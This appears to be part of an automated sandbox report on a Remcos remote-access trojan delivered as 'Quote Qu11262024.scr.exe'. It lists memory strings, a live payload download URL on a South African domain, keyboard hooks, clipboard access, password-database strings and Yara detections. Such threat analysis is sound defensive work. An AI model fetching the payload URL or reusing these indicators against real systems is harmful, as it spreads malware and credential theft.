              Source: bhv953.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2022-09-17-00-05-23/PreSignInSettingsConfig.json?One
              Source: bhv953.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-30-24/PreSignInSettingsConfig.json?One
              Source: bhv953.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/PreSignInSettings/Prod/2023-10-05-06-40-12/PreSignInSettingsConfig.json
              Source: bhv953.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/update100.xml?OneDriveUpdate=14d1c105224b3e736c3c
              Source: bhv953.tmp.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3e8c607c445262f3add0e58b18f19e0502af.xml?OneDriveUpdate=7fe112
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
              Source: bhv953.tmp.6.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
              Source: bhv953.tmp.6.drString found in binary or memory: https://www.digicert.com/CPS0
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
              Source: Quote Qu11262024.scr.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611673373.00000000079D0000.00000004.00001000.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.bin
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D08000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.binS
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.healthselflesssupplies.co.za/GKSZQPVYFBHuSxeCc116.bincd
              Source: bhv953.tmp.6.drString found in binary or memory: https://www.office.com/
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownHTTPS traffic detected: 164.160.91.32:443 -> 192.168.2.6:49769 version: TLS 1.2

              Key, Mouse, Clipboard, Microphone and Screen Capturing

              barindex
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\Quote Qu11262024.scr.exeJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_00405339 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00405339
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_0040987A
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,6_2_004098E2
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,7_2_00406DFC
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,7_2_00406E9F
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,8_2_004068B5
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_004072B5

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 00000003.00000003.2587088488.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2612294134.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2606934704.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2605511155.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2634566543.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611262368.0000000005D7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000003.2609800552.0000000005D77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4604168918.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000003.00000002.4611141231.0000000005D49000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Quote Qu11262024.scr.exe PID: 5712, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeProcess Stats: CPU usage > 49%
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,6_2_0040DD85
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00401806 NtdllDefWindowProc_W,6_2_00401806
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_004018C0 NtdllDefWindowProc_W,6_2_004018C0
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004016FD NtdllDefWindowProc_A,7_2_004016FD
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004017B7 NtdllDefWindowProc_A,7_2_004017B7
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00402CAC NtdllDefWindowProc_A,8_2_00402CAC
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00402D66 NtdllDefWindowProc_A,8_2_00402D66
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_00403328 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403328
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_00403328 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403328
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Windows\resources\mineralrigste.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Windows\resources\0809Jump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Windows\spaller.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_00404B780_2_00404B78
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_738E1A9C0_2_738E1A9C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_00404B783_2_00404B78
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_371571943_2_37157194
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_3714B5C13_2_3714B5C1
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044B0406_2_0044B040
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0043610D6_2_0043610D
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_004473106_2_00447310
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044A4906_2_0044A490
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040755A6_2_0040755A
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0043C5606_2_0043C560
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044B6106_2_0044B610
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044D6C06_2_0044D6C0
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_004476F06_2_004476F0
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044B8706_2_0044B870
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044081D6_2_0044081D
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_004149576_2_00414957
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_004079EE6_2_004079EE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00407AEB6_2_00407AEB
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044AA806_2_0044AA80
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00412AA96_2_00412AA9
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00404B746_2_00404B74
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00404B036_2_00404B03
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0044BBD86_2_0044BBD8
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00404BE56_2_00404BE5
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00404C766_2_00404C76
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00415CFE6_2_00415CFE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00416D726_2_00416D72
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00446D306_2_00446D30
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00446D8B6_2_00446D8B
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00406E8F6_2_00406E8F
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004050387_2_00405038
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0041208C7_2_0041208C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004050A97_2_004050A9
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0040511A7_2_0040511A
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0043C13A7_2_0043C13A
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004051AB7_2_004051AB
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004493007_2_00449300
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0040D3227_2_0040D322
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0044A4F07_2_0044A4F0
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0043A5AB7_2_0043A5AB
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004136317_2_00413631
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004466907_2_00446690
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0044A7307_2_0044A730
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004398D87_2_004398D8
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_004498E07_2_004498E0
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0044A8867_2_0044A886
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0043DA097_2_0043DA09
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00438D5E7_2_00438D5E
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00449ED07_2_00449ED0
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_0041FE837_2_0041FE83
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 7_2_00430F547_2_00430F54
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004050C28_2_004050C2
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004014AB8_2_004014AB
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004051338_2_00405133
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004051A48_2_004051A4
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004012468_2_00401246
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_0040CA468_2_0040CA46
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004052358_2_00405235
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004032C88_2_004032C8
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004222D98_2_004222D9
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_004016898_2_00401689
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00402F608_2_00402F60
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 00402ACB appears 48 times
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: String function: 00416760 appears 69 times
              Source: Quote Qu11262024.scr.exeStatic PE information: invalid certificate
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2634410552.0000000005DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2635001943.0000000005DC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2634725842.0000000005DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2612497528.0000000005DB4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2634597119.00000000367C4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2635272858.0000000005DD6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000003.00000003.2612497528.0000000005DC5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4635581411.000000003712B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exeBinary or memory string: OriginalFileName vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exeBinary or memory string: OriginalFilename vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exe, 00000008.00000002.2621675646.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs Quote Qu11262024.scr.exe
              Source: Quote Qu11262024.scr.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/18@4/3
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,6_2_004182CE
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_00403328 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403328
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 3_2_00403328 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_00403328
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 8_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,8_2_00410DE1
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_00404605 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404605
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,6_2_00413D4C
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 0_2_004020D1 CoCreateInstance,MultiByteToWideChar,0_2_004020D1
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeCode function: 6_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,6_2_0040B58D
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\saginawJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-E5Y2QK
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile created: C:\Users\user\AppData\Local\Temp\nsl4AD5.tmpJump to behavior
              Source: Quote Qu11262024.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeSystem information queried: HandleInformationJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\Quote Qu11262024.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000007.00000002.2618702711.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: Quote Qu11262024.scr.exe, 00000003.00000002.4635408244.0000000037020000.00000040.10000000.00040000.00000000.sdmp, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: Quote Qu11262024.scr.exe, 00000006.00000002.2630919694.00000000022C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Quote Qu11262024.scr.exe, Quote Qu11262024.scr.exe, 00000006.00000002.2630485765.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
